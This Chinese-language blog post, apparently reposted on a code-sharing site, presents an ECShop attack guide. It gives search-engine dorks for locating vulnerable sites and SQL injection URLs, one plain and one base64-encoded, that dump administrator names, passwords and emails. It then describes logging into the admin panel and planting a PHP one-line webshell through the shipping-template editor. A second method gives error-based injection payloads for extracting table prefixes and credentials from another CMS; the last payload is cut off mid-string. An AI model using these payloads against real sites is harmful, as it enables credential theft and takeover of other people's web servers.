ecshop老版本安全漏洞

昨晚上翻阅一本技术书籍中，找到灵感，发现的ECshop漏洞。
搜索关键字：关键字：powered by ecshop
方法一：
普通代码：

user.php?act=order_query&order_sn=* union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*

变种代码：

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

直接在网站后台加入代码回车就能爆出帐号密码，再去掉代码加上/admin回车就能直接进后台了。
拿shell方法很简单，找到“库项目管理”再选择“配送的方式”，在代码最下面插入php一句话木马： 不行就换php木马的预代码！
接着保存，一句话路径是：http:// .xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址，点击一下环境变量，成功之后点击上传文件就可以拿shell了。
方法二
关键字：
inurl:index.php?ac=article&at=read&did=
默认后台：adminsoft/index.php 或者 admin/
注入点(爆表前缀，比如：cm_admin......前缀就是cm，后面3个代码要自行替换):

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密码：
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele

本文标签：

声明：本文由代码号注册/游客用户【关戚栾】供稿发布，本站不对用户发布的ecshop老版本安全漏洞信息内容原创度和真实性等负责。如内容侵犯您的版权或其他权益，请留言并加以说明。站长审查之后若情况属实会及时为您删除。同时遵循 CC 4.0 BY-SA 版权协议，尊重和保护作者的劳动成果，转载请标明出处链接和本声明内容。本文作者：关戚栾» https://www.ebingou.cn/dmh/13372.html

很赞哦！ ()